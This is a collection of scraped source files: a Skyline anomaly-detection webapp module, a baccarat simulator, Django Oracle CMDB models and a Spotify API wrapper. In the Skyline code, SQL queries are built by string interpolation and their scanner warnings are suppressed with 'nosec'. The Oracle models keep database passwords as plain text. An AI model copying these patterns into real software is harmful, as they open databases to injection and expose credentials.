logger.error('error :: %s' % str(e))
logger.error('error :: luminosity_remote_data :: could not determine unique_metrics from Redis set')
if not unique_metrics:
message = 'error :: luminosity_remote_data :: could not determine unique_metrics from Redis set'
return luminosity_data, success, message
logger.info('luminosity_remote_data :: %s unique_metrics' % str(len(unique_metrics)))
# @added 20210125 - Feature #3956: luminosity - motifs
# Improve luminosity_remote_data performance
# Although the is_derivative_metric function is appropriate in the below
# loop here that is not the most performant manner in which to determine if
# the metrics are derivatives, as it needs to fire on every metric, so here
# we just trust the Redis derivative_metrics list. This increases
# performance on 1267 metrics from 6.442009 seconds to 1.473067 seconds
try:
derivative_metrics = list(REDIS_CONN_DECODED.smembers('derivative_metrics'))
except:
derivative_metrics = []
# assigned metrics
assigned_min = 0
assigned_max = len(unique_metrics)
assigned_keys = range(assigned_min, assigned_max)
# Compile assigned metrics
assigned_metrics = [unique_metrics[index] for index in assigned_keys]
# Check if this process is unnecessary
if len(assigned_metrics) == 0:
message = 'error :: luminosity_remote_data :: assigned_metrics length is 0'
logger.error(message)
return luminosity_data, success, message
# Multi get series
raw_assigned_failed = True
try:
raw_assigned = REDIS_CONN.mget(assigned_metrics)
raw_assigned_failed = False
except:
logger.info(traceback.format_exc())
message = 'error :: luminosity_remote_data :: failed to mget raw_assigned'
logger.error(message)
return luminosity_data, success, message
if raw_assigned_failed:
message = 'error :: luminosity_remote_data :: failed to mget raw_assigned'
logger.error(message)
return luminosity_data, success, message
# Distill timeseries strings into lists
for i, metric_name in enumerate(assigned_metrics):
timeseries = []
try:
raw_series = raw_assigned[i]
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
except:
timeseries = []
if not timeseries:
continue
# @added 20200507 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
# Convert the time series if this is a known_derivative_metric
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
# @added 20201117 - Feature #3824: get_cluster_data
# Feature #2464: luminosity_remote_data
# Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Convert metric_name bytes to str
metric_name = str(metric_name)
# @modified 20210125 - Feature #3956: luminosity - motifs
# Improve luminosity_remote_data performance
# Although the is_derivative_metric function is appropriate here it is
# not the most performant manner in which to determine if the metric
# is a derivative in this case as it needs to fire on every metric, so
# here we just trust the Redis derivative_metrics list. This increases
# performance on 1267 metrics from 6.442009 seconds to 1.473067 seconds
# if metric_name.startswith(settings.FULL_NAMESPACE):
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
# else:
# base_name = metric_name
# known_derivative_metric = is_derivative_metric('webapp', base_name)
known_derivative_metric = False
if metric_name in derivative_metrics:
known_derivative_metric = True
if known_derivative_metric:
try:
derivative_timeseries = nonNegativeDerivative(timeseries)
timeseries = derivative_timeseries
except:
logger.error('error :: nonNegativeDerivative failed')
# @modified 20210125 - Feature #3956: luminosity - motifs
# Improve luminosity_remote_data performance
# The list comprehension method halves the time to create the
# correlate_ts from 0.0008357290644198656 to 0.0004676780663430691 seconds
# correlate_ts = []
# for ts, value in timeseries:
# if int(ts) < from_timestamp:
# continue
# if int(ts) <= anomaly_timestamp:
# correlate_ts.append((int(ts), value))
# if int(ts) > (anomaly_timestamp + until_timestamp):
# break
correlate_ts = [x for x in timeseries if x[0] >= from_timestamp if x[0] <= until_timestamp]
if not correlate_ts:
continue
metric_data = [str(metric_name), correlate_ts]
luminosity_data.append(metric_data)
logger.info('luminosity_remote_data :: %s valid metric time series data preprocessed for the remote request' % str(len(luminosity_data)))
return luminosity_data, success, message
# @added 20200908 - Feature #3740: webapp - anomaly API endpoint
def panorama_anomaly_details(anomaly_id):
"""
Gets the details for an anomaly from the database.
"""
logger.info('panorama_anomaly_details - getting details for anomaly id %s' % str(anomaly_id))
metric_id = 0
# Added nosec to exclude from bandit tests
query = 'select metric_id from anomalies WHERE id=\'%s\'' % str(anomaly_id) # nosec
try:
result = mysql_select(skyline_app, query)
metric_id = int(result[0][0])
except:
logger.error(traceback.format_exc())
logger.error('error :: panorama_anomaly_details - failed to get metric_id from db')
return False
if metric_id > 0:
logger.info('panorama_anomaly_details - getting metric for metric_id - %s' % str(metric_id))
# Added nosec to exclude from bandit tests
query = 'select metric from metrics WHERE id=\'%s\'' % str(metric_id) # nosec
try:
result = mysql_select(skyline_app, query)
metric = str(result[0][0])
except:
logger.error(traceback.format_exc())
logger.error('error :: panorama_anomaly_details - failed to get metric from db')
return False
query = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp from anomalies WHERE id=\'%s\'' % str(anomaly_id) # nosec
logger.info('panorama_anomaly_details - running query - %s' % str(query))
try:
rows = mysql_select(skyline_app, query)
except:
logger.error(traceback.format_exc())
logger.error('error :: panorama_anomaly_details - failed to get anomaly details from db')
return False
anomaly_data = None
for row in rows:
anomalous_datapoint = float(row[2])
anomaly_timestamp = int(row[3])
full_duration = int(row[4])
created_timestamp = str(row[5])
try:
anomaly_end_timestamp = int(row[6])
except:
anomaly_end_timestamp = None
anomaly_data = [int(anomaly_id), str(metric), anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp]
break
return anomaly_data
# @added 20201103 - Feature #3824: get_cluster_data
# @modified 20201127 - Feature #3824: get_cluster_data
# Feature #3820: HORIZON_SHARDS
# Allow to query only a single host in the cluster so that just the response
# can from a single host in the cluster can be evaluated
def get_cluster_data(api_endpoint, data_required, only_host='all', endpoint_params={}):
"""
Gets data from the /api of REMOTE_SKYLINE_INSTANCES. This allows the user
to query a single Skyline webapp node in a cluster and the Skyline instance
will respond with the concentated responses of all the
REMOTE_SKYLINE_INSTANCES in one a single response.
:param api_endpoint: the api endpoint to request data from the remote
Skyline instances
:param data_required: the element from the api json response that is
required
:param only_host: The remote Skyline host to query, if not passed all are
queried.
:param endpoint_params: A dictionary of any additional parameters that may
be required
:type api_endpoint: str
:type data_required: str
:type only_host: str
:type endpoint_params: dict
:return: list
:rtype: list
"""
try:
connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT)
read_timeout = int(settings.GRAPHITE_READ_TIMEOUT)
except:
connect_timeout = 5
read_timeout = 10
use_timeout = (int(connect_timeout), int(read_timeout))
data = []
if only_host != 'all':
logger.info('get_cluster_data :: querying all remote hosts as only_host set to %s' % (
str(only_host)))
for item in settings.REMOTE_SKYLINE_INSTANCES:
r = None
user = None
password = None
use_auth = False
# @added 20201127 - Feature #3824: get_cluster_data
# Feature #3820: HORIZON_SHARDS
# Allow to query only a single host in the cluster so that just the response
# can from a single host in the cluster can be evaluated
if only_host != 'all':
if only_host != str(item[0]):
logger.info('get_cluster_data :: not querying %s as only_host set to %s' % (
str(item[0]), str(only_host)))
continue
else:
logger.info('get_cluster_data :: querying %s as only_host set to %s' % (
str(item[0]), str(only_host)))
try:
user = str(item[1])
password = str(item[2])
use_auth = True
except:
user = None
password = None
logger.info('get_cluster_data :: querying %s for %s on %s' % (
str(item[0]), str(data_required), str(api_endpoint)))
try:
url = '%s/api?%s' % (str(item[0]), api_endpoint)
if use_auth:
r = requests.get(url, timeout=use_timeout, auth=(user, password))
else:
r = requests.get(url, timeout=use_timeout)
except:
logger.error(traceback.format_exc())
logger.error('error :: get_cluster_data :: failed to %s from %s' % (
api_endpoint, str(item)))
if r:
if r.status_code != 200:
logger.error('error :: get_cluster_data :: %s from %s responded with status code %s and reason %s' % (
api_endpoint, str(item), str(r.status_code), str(r.reason)))
js = None
try:
js = r.json()
except:
logger.error(traceback.format_exc())
logger.error('error :: get_cluster_data :: failed to get json from the response from %s on %s' % (
api_endpoint, str(item)))
remote_data = []
if js:
logger.info('get_cluster_data :: got response for %s from %s' % (
str(data_required), str(item[0])))
try:
remote_data = js['data'][data_required]
except:
logger.error(traceback.format_exc())
logger.error('error :: get_cluster_data :: failed to build remote_data from %s on %s' % (
str(data_required), str(item)))
if remote_data:
logger.info('get_cluster_data :: got %s %s from %s' % (
str(len(remote_data)), str(data_required), str(item[0])))
data = data + remote_data
return data
# @added 20201125 - Feature #3850: webapp - yhat_values API endoint
def get_yhat_values(
metric, from_timestamp, until_timestamp, include_value, include_mean,
include_yhat_real_lower, include_anomalous_periods):
timeseries = []
try:
logger.info('get_yhat_values :: for %s from %s until %s' % (
metric, str(from_timestamp), str(until_timestamp)))
timeseries = get_graphite_metric('webapp', metric, from_timestamp, until_timestamp, 'list', 'object')
except:
logger.error(traceback.format_exc())
logger.error('error :: get_yhat_values :: failed to get timeseries data for %s' % (
metric))
return None
yhat_dict = {}
logger.info('get_yhat_values :: %s values in timeseries for %s to calculate yhat values from' % (
str(len(timeseries)), metric))
# @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
anomalous_periods_dict = {}
if timeseries:
metric_id = 0
if metric:
logger.info('get_yhat_values :: getting db id for metric - %s' % metric)
query = 'select id from metrics WHERE metric=\'%s\'' % metric # nosec
try:
result = mysql_select(skyline_app, query)
metric_id = int(result[0][0])
except:
logger.error('error :: get_yhat_values :: failed to get id from db: %s' % traceback.format_exc())
anomalies_at = []
if metric_id:
logger.info('get_yhat_values :: getting latest anomalies')
query = 'select anomaly_timestamp, anomalous_datapoint, anomaly_end_timestamp from anomalies WHERE metric_id=%s AND anomaly_timestamp >= %s AND anomaly_timestamp <= %s' % (
str(metric_id), str(from_timestamp), str(until_timestamp))
try:
rows = mysql_select(skyline_app, query)
for row in rows:
a_timestamp = int(row[0])
a_value = float(row[1])
try:
a_end_timestamp = int(row[2])
except:
a_end_timestamp = 0
anomalies_at.append([a_timestamp, a_value, a_end_timestamp])
except:
logger.error('error :: get_yhat_values :: failed to get anomalies from db: %s' % traceback.format_exc())
rows = []
timeseries_ranges = []
last_timestamp = None
for index, item in enumerate(timeseries):
if last_timestamp:
t_range = list(range(last_timestamp, int(item[0])))
timeseries_ranges.append([index, t_range, item])
last_timestamp = int(item[0])
t_range = list(range(last_timestamp, (int(item[0]) + 1)))
timeseries_ranges.append([index, t_range, item])
anomalies_index = []
for index, time_range, item in timeseries_ranges:
for a_timestamp, a_value, a_end_timestamp in anomalies_at:
if a_timestamp in time_range:
anomalies_index.append([index, item])
anomalous_period_indices = []
anomalies_indices = [item[0] for item in anomalies_index]
for index, item in enumerate(timeseries):
for idx in anomalies_indices:
anomaly_index_range = list(range((idx - 3), (idx + 5)))
if index in anomaly_index_range:
for i in anomaly_index_range:
anomalous_period_indices.append(i)
anomaly_timestamps_indices = []
anomalies = []
for item in anomalies_index:
anomaly_timestamps_indices.append(item[0])
anomalies.append(item[1])
if timeseries:
try:
array_amin = np.amin([item[1] for item in timeseries])
values = []
# @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
# last_value = None
# start_anomalous_period = None
# end_anomalous_period = None
# sigma3_array = []
# sigma3_values = []
# extended_values = []
last_breach = 0
breach_for = 10
last_breach_vector = 'positive'
# last_used_extended = False
# last_used_extended_value = None
top = []
bottom = []
left = []
right = []
# @modified 20210126 - Task #3958: Handle secondary algorithms in yhat_values
# for ts, value in timeseries:
# values.append(value)
# va = np.array(values)
# va_mean = va.mean()
# va_std_3 = 3 * va.std()
for index, item in enumerate(timeseries):
ts = item[0]
value = item[1]
values.append(value)
va = np.array(values)
va_mean = va.mean()
va_std_3 = 3 * va.std()
# @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
anomalous_period = 0
three_sigma_lower = va_mean - va_std_3
three_sigma_upper = va_mean + va_std_3
# sigma3_array.append([ts, value, va_mean, [three_sigma_lower, three_sigma_upper]])
# sigma3_values.append([three_sigma_lower, three_sigma_upper])
use_extended = False
drop_expected_range = False
if index not in anomaly_timestamps_indices:
use_extended = True
# if last_used_extended:
# last_used_extended_value = None
else:
drop_expected_range = True
for anomaly_index in anomaly_timestamps_indices:
if index > anomaly_index:
# if index < (anomaly_index + 30):
if index < (anomaly_index + breach_for):
use_extended = False
anomalous_period = 1
break
extended_lower = three_sigma_lower
extended_upper = three_sigma_upper
if use_extended:
if item[1] > three_sigma_upper:
extended_lower = three_sigma_lower
extended_upper = (item[1] + ((item[1] / 100) * 5))
last_breach = index
last_breach_vector = 'positive'
elif item[1] < three_sigma_lower:
extended_lower = (item[1] - ((item[1] / 100) * 5))
extended_upper = three_sigma_upper
last_breach = index
last_breach_vector = 'negative'
elif index < (last_breach + breach_for) and index > last_breach:
if last_breach_vector == 'positive':
extended_value = (item[1] + ((item[1] / 100) * 5))
three_sigma_value = three_sigma_upper
if three_sigma_value > extended_value:
extended_value = (three_sigma_value + ((three_sigma_value / 100) * 5))
extended_lower = three_sigma_lower
extended_upper = extended_value
else:
extended_lower = (item[1] - ((item[1] / 100) * 5))
extended_upper = three_sigma_upper
if drop_expected_range:
use_extended = False
if last_breach_vector == 'positive':
extended_lower = three_sigma_lower - (three_sigma_upper * 0.1)
extended_upper = item[1] - (item[1] * 0.1)
if last_breach_vector == 'negative':
extended_lower = three_sigma_lower - (three_sigma_lower * 0.1)
extended_upper = item[1] + (item[1] * 0.1)
else:
extended_lower = three_sigma_lower
extended_upper = three_sigma_upper
if drop_expected_range:
use_extended = False
if last_breach_vector == 'positive':
extended_lower = three_sigma_lower - (three_sigma_upper * 0.1)
extended_upper = item[1] - (item[1] * 0.1)
if last_breach_vector == 'negative':
extended_lower = three_sigma_lower - (three_sigma_lower * 0.1)
extended_upper = item[1] + (item[1] * 0.1)
else:
extended_lower = three_sigma_lower
extended_upper = three_sigma_upper
if drop_expected_range:
use_extended = False
if last_breach_vector == 'positive':
extended_lower = three_sigma_lower - (three_sigma_upper * 0.1)
extended_upper = item[1] - (item[1] * 0.1)
if last_breach_vector == 'negative':
extended_lower = three_sigma_lower - (three_sigma_lower * 0.1)
extended_upper = item[1] + (item[1] * 0.1)
# extended_values.append([extended_lower, extended_upper])
lower = extended_lower
upper = extended_upper
if index in sorted(list(set(anomalous_period_indices))):
if index in anomalies_indices:
continue
for idx in anomaly_timestamps_indices:
if (index + 3) == idx:
a_top = extended_upper + (extended_upper * 0.1)
top.append(a_top)
a_bottom = extended_lower - (extended_lower * 0.1)
bottom.append(a_bottom)
a_left = item[0]
left.append(a_left)
if (index - 4) == idx:
a_right = item[0]
right.append(a_right)
# @modified 20201126 - Feature #3850: webapp - yhat_values API endoint
# Change dict key to int not float
int_ts = int(ts)
yhat_dict[int_ts] = {}
if include_value:
yhat_dict[int_ts]['value'] = value
if include_mean:
yhat_dict[int_ts]['mean'] = va_mean
if include_mean:
yhat_dict[int_ts]['mean'] = va_mean
# @modified 20210201 - Task #3958: Handle secondary algorithms in yhat_values
# yhat_lower = va_mean - va_std_3
yhat_lower = lower
yhat_upper = upper
if include_yhat_real_lower:
# @modified 20201202 - Feature #3850: webapp - yhat_values API endoint
# Set the yhat_real_lower correctly
# if yhat_lower < array_amin and array_amin == 0:
# yhat_dict[int_ts]['yhat_real_lower'] = array_amin
if yhat_lower < 0 and array_amin > -0.0000000001:
yhat_dict[int_ts]['yhat_real_lower'] = 0
else:
yhat_dict[int_ts]['yhat_real_lower'] = yhat_lower
yhat_dict[int_ts]['yhat_lower'] = yhat_lower
# @modified 20210201 - Task #3958: Handle secondary algorithms in yhat_values
yhat_dict[int_ts]['yhat_upper'] = va_mean + va_std_3
yhat_dict[int_ts]['yhat_upper'] = upper
# @added 20210201 - Task #3958: Handle secondary algorithms in yhat_values
if use_extended:
if yhat_lower != three_sigma_lower:
yhat_dict[int_ts]['3sigma_lower'] = three_sigma_lower
if yhat_upper != three_sigma_upper:
yhat_dict[int_ts]['3sigma_upper'] = three_sigma_upper
if include_anomalous_periods:
yhat_dict[int_ts]['anomalous_period'] = anomalous_period
except:
logger.error(traceback.format_exc())
logger.error('error :: get_yhat_values :: failed create yhat_dict for %s' % (
metric))
return None
logger.info('get_yhat_values :: calculated yhat values for %s data points' % str(len(yhat_dict)))
if yhat_dict:
yhat_dict_cache_key = 'webapp.%s.%s.%s.%s.%s.%s' % (
metric, str(from_timestamp), str(until_timestamp),
str(include_value), str(include_mean),
str(include_yhat_real_lower))
logger.info('get_yhat_values :: saving yhat_dict to Redis key - %s' % yhat_dict_cache_key)
try:
REDIS_CONN.setex(yhat_dict_cache_key, 14400, str(yhat_dict))
logger.info('get_yhat_values :: created Redis key - %s with 14400 TTL' % yhat_dict_cache_key)
except:
logger.error(traceback.format_exc())
logger.error('error :: get_yhat_values :: failed to setex Redis key - %s' % yhat_dict_cache_key)
# @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
# Add rectangle coordinates that describe anomalous periods
anomalous_periods_dict['rectangles'] = {}
anomalous_periods_dict['rectangles']['top'] = top
anomalous_periods_dict['rectangles']['bottom'] = bottom
anomalous_periods_dict['rectangles']['left'] = left
anomalous_periods_dict['rectangles']['right'] = right
if anomalous_periods_dict:
yhat_anomalous_periods_dict_cache_key = 'webapp.%s.%s.%s.%s.%s.%s.anomalous_periods' % (
metric, str(from_timestamp), str(until_timestamp),
str(include_value), str(include_mean),
str(include_yhat_real_lower))
logger.info('get_yhat_values :: saving yhat_dict to Redis key - %s' % yhat_anomalous_periods_dict_cache_key)
try:
REDIS_CONN.setex(yhat_anomalous_periods_dict_cache_key, 14400, str(yhat_anomalous_periods_dict_cache_key))
logger.info('get_yhat_values :: created Redis key - %s with 14400 TTL' % yhat_anomalous_periods_dict_cache_key)
except:
logger.error(traceback.format_exc())
logger.error('error :: get_yhat_values :: failed to setex Redis key - %s' % yhat_dict_cache_key)
# @modified 20210201 - Task #3958: Handle secondary algorithms in yhat_values
# return yhat_dict
return yhat_dict, anomalous_periods_dict
| [
"gary.wilson@of-networks.co.uk"
] | gary.wilson@of-networks.co.uk |
4566d265de8c9de17ff705716fb33d9a946acd40 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /dockerized-gists/2632280/snippet.py | 2c3e53153055035e65c3c069b7b509579d65212b | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 2,057 | py | #!/usr/bin/python
#
import sys
import os
import copy
import random
deck = [1,2,3,4,5,6,7,8,9,0,0,0,0]
deck = [1,2,3,4,5,6,7,8,9,0,0,0,0]
results = {
'bank': 0,
'player': 0,
'tie': 0,
}
def generate_deck(n=1):
decks = deck * 4 * n
random.shuffle(decks)
return decks
def simulate_game(decks):
player = [decks.pop()]
bank = [decks.pop()]
player.append(decks.pop())
bank.append(decks.pop())
player_score = sum(player) % 10
bank_score = sum(bank) % 10
if player_score >= 8 or bank_score >= 8:
if player_score > bank_score:
return 'player'
elif bank_score > player_score:
return 'bank'
else:
return 'tie'
# player draws 3rd card
if player_score <= 5:
pcard = decks.pop()
player.append(pcard)
# bank rules
if pcard in (2,3) and bank_score <= 4:
bank.append(decks.pop())
elif pcard in (4,5) and bank_score <= 5:
bank.append(decks.pop())
elif pcard in (6,7) and bank_score <= 6:
bank.append(decks.pop())
elif pcard == 8 and bank_score <= 2:
bank.append(decks.pop())
elif pcard in (1,9,0) and bank_score <= 3:
bank.append(decks.pop())
elif bank_score <= 5:
bank.append(decks.pop())
player_score = sum(player) % 10
bank_score = sum(bank) % 10
if player_score == bank_score:
return 'tie'
return 'player' if player_score > bank_score else 'bank'
def main():
for i in range(3000):
# 3000 game / 8 decks of cards each
decks = generate_deck(8)
while len(decks) > 10:
winner = simulate_game(decks)
results[winner] += 1
total = results['player'] + results['bank'] + results['tie']
print "Baccarat probabilties"
print 'P(win|player)', results['player'] / float(total)
print 'P(win|bank) ', results['bank'] / float(total)
print 'P(tie) ', results['tie'] / float(total)
if __name__=="__main__":
main()
| [
"gistshub@gmail.com"
] | gistshub@gmail.com |
40ad77e61a4e82b015bf0da7e66515953ad9eed4 | 2b5fd9d436a97726f852a12bab58b8d367f4866a | /apps/CMDB/model/oracle_modles.py | 85cecdfda15e7e6ac6002550d0218e5453001bc2 | [] | no_license | lxlzyf/roe | 07ff551b142c0411acb7ca6f759ea98b40ad9b72 | 2d7f1b01e2456875d14a75c90d8397965215bcd3 | refs/heads/master | 2020-03-27T06:00:43.587235 | 2018-08-20T10:47:47 | 2018-08-20T10:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,361 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from CMDB.model.yewutree_model import YewuTree
from django.contrib.auth.models import User
#群,一定属于某一个产品线,可能属于多个组,一个节点也是群
class OracleCluster(models.Model):
arch = (
(u"主从", u"主从"),
(u"单机", u"单击"),
(u"rac", u"rac"),
(u"rac+从库", u"rac+从库")
)
name = models.CharField(u"集群名", max_length=30, blank=True,null=True)
arch = models.CharField(verbose_name=u"集群架构", choices=arch, max_length=30, null=True, blank=True)
db_version = models.CharField(verbose_name=u"数据库版本", max_length=30, null=True, blank=True)
defaultdb=models.CharField(verbose_name=u"主用DB", max_length=30, null=True, blank=True)
tree_id=models.ForeignKey(YewuTree,verbose_name=u"所属产品线", on_delete=models.SET_NULL, null=True, blank=True)
desc = models.CharField(u"描述", max_length=100, null=True, blank=True)
operator = models.ManyToManyField(User, verbose_name="可见的人", blank=True)
def __unicode__(self):
return self.name
class Meta:
db_table = 'Oracle_Cluster'
verbose_name = 'Oracle 集群'
verbose_name_plural = 'Oracle集群'
# 按照用户来划分产品线
class OracleUser(models.Model):
db_user = models.CharField(max_length=30, null=True,blank=True)
db_password=models.CharField(max_length=60, null=True,blank=True)
privlige=models.CharField(verbose_name='权限',max_length=400, null=True,blank=True)
dbcluster = models.ForeignKey(OracleCluster,verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
def __unicode__(self):
return self.db_user
class Meta:
db_table = 'Oracle_User'
verbose_name = 'Oracle用户'
verbose_name_plural = 'Oracle用户'
#数据库中的 DB,表空间信息
class Oracletablespace(models.Model):
tablespace_name = models.CharField(max_length=50,verbose_name=u"表空间名")
dbcluster = models.ForeignKey(OracleCluster,verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
tablespace_size=models.CharField(max_length=50,verbose_name=u"库大小")
def __unicode__(self):
return u'%s ' % ( self.tablespace_name)
class Meta:
db_table = 'Oracle_Tablespace'
verbose_name = 'Oracle 表空间'
verbose_name_plural = 'Oracle表空间'
#ORACLE 实例表。配置信息慢慢添加
class Oracle_Instance(models.Model):
DB_ROLE = (
(u"单库", u"单库"),
(u"主库", u"主库"),
(u"从库", u"从库"),
(u"汇总", u"汇总")
)
DB_STATUS = (
(u"使用中", u"使用中"),
(u"未使用", u"未使用"),
(u"故障", u"故障"),
(u"其它", u"其它"),
)
dbtag = models.CharField(max_length=50, verbose_name=u"数据库标志", blank=True,null=True)
vist_ip = models.GenericIPAddressField(verbose_name=u"访问VIP", max_length=15)
m_ip = models.GenericIPAddressField(verbose_name=u"管理IP", max_length=15)
other_ip= models.CharField(max_length=150, verbose_name=u"其他IP,逗号隔开")
port = models.IntegerField(verbose_name=u"端口",default=1521)
sid = models.CharField(verbose_name=u"SID", max_length=8,blank=True,null=True)
idc = models.CharField(verbose_name=u"机房", max_length=18,blank=True,null=True)
CLUSTER = models.ForeignKey(OracleCluster, verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
role = models.CharField(verbose_name=u"DB角色", choices=DB_ROLE, max_length=30, null=True, blank=True)
db_status = models.CharField(verbose_name=u"DB状态", choices=DB_STATUS, max_length=30, null=True, blank=True)
memory = models.CharField(u"分配内存", max_length=30, null=True, blank=True)
disk = models.CharField(u"磁盘位置", max_length=200, null=True, blank=True)
memo = models.TextField(u"备注信息", max_length=200, null=True, blank=True)
def __unicode__(self):
return self.dbtag
class Meta:
db_table = 'Oracle_Instance'
verbose_name = 'Oracle集群一个实例'
verbose_name_plural = 'Oracle集群一个实例' | [
"flc009@163.com"
] | flc009@163.com |
3a349a33e9e4531c9a6cddd12c53e9f0b04d76cf | e592f12040848bedbe6ffe309cceb757366d1887 | /Spotify_main.py | caf867bcdd3b05c8dbc58e7780a1c9cffd8349ef | [] | no_license | Hadryan/Spotify_music_recommender-1 | 02a3f0e1b8545f99643bbc9ee72dd2869366d5c1 | dcaf6a518c29f7c12062fc7bc8e143d8edc9d588 | refs/heads/main | 2023-03-05T21:49:59.022693 | 2021-02-10T05:18:32 | 2021-02-10T05:18:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,582 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 8 15:43:03 2021
@author: Victor
"""
import Spotify_Authorization
import spotipy
import pandas as pd
class Spotify_app():
def __init__(self):
self.auth = Spotify_Authorization.auth()
self.spotify = spotipy.Spotify(auth_manager=self.auth)
self.ids = []
self.artists = []
self.explicit = []
self.name = []
self.pop = []
self.rel_date = []
def clean_lists(self):
self.ids.clear()
self.artists.clear()
self.explicit.clear()
self.name.clear()
self.pop.clear()
self.rel_date.clear()
def artist_toptracks(self, artist_id):
artist = self.spotify.artist_top_tracks(artist_id)
for i in artist['tracks']:
self.artists.append(([x['name'] for x in i['artists']]))
if i['explicit'] == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(i['name'])
self.pop.append(i['popularity'])
self.ids.append(i['id'])
self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def album(self, album_id):
album = self.spotify.album_tracks(album_id)
for i in album['items']:
self.artists.append([x['name'] for x in i['artists']])
if (i['explicit']) == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(i['name'])
self.pop.append(self.spotify.track(i['id'])['popularity'])
self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
self.ids.append(i['id'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def track(self, track_id):
track = self.spotify.track(track_id)
self.artists.append([i['name'] for i in track['artists']])
if track['explicit'] == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(track['name'])
self.pop.append(track['popularity'])
self.ids.append(track['id'])
self.rel_date.append(track['album']['release_date'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def get_artist_id(self, artist_name):
dummy = []
search = self.spotify.search(q=artist_name, type='artist')
for i in search['artists']['items']:
dummy.append([i['id'], i['name'], i['genres']])
artist_id = pd.DataFrame(dummy)
artist_id.columns = ['id', 'Artist Name', 'Genres']
return artist_id
def get_track_id(self, track_name):
dummy = []
search = self.spotify.search(q=track_name, type='track')
for i in search['tracks']['items']:
dummy.append([i['name'], [j['name'] for j in i['artists']], i['id']])
track_id = pd.DataFrame(dummy)
track_id.columns = ['Song name', 'Artists', 'id']
return track_id
def get_audio_features(self, ids):
val = []
for music_id in ids:
audio = self.spotify.audio_features(music_id)
[audio[0].pop(k) for k in ['type', 'uri', 'track_href', 'analysis_url', 'time_signature']]
val.append([i for i in audio[0].values()])
index = [i for i in audio[0].keys()]
audio_features = pd.DataFrame(val)
audio_features.columns = index
return audio_features
def get_full_data(self, remain, audio_features):
remain.columns = ['explicit', 'artists', 'name', 'release_date', 'year', 'popularity']
data = pd.concat([audio_features, remain], axis=1)
cols = ['acousticness', 'artists', 'danceability', 'duration_ms', 'energy', 'explicit', 'id', 'instrumentalness', 'key', 'liveness', 'loudness', 'mode', 'name', 'popularity', 'release_date', 'speechiness', 'tempo', 'valence', 'year']
data = data[cols]
return data
def playlist(self, playlist_id):
pl=self.spotify.playlist_tracks(playlist_id=playlist_id)
for i in pl['items']:
self.artists.append([x['name'] for x in i['track']['artists']])
if i['track']['explicit'] == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(i['track']['name'])
self.pop.append(i['track']['popularity'])
self.rel_date.append(i['track']['album']['release_date'])
self.ids.append(i['track']['id'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def related_artists(self, artist_name):
related_artists = []
artist_id = self.get_artist_id(artist_name).iloc[0,0]
search = self.spotify.artist_related_artists(artist_id)
for i in search['artists']:
related_artists.append([i['name'], i['id']])
return pd.DataFrame(related_artists)
| [
"noreply@github.com"
] | Hadryan.noreply@github.com |
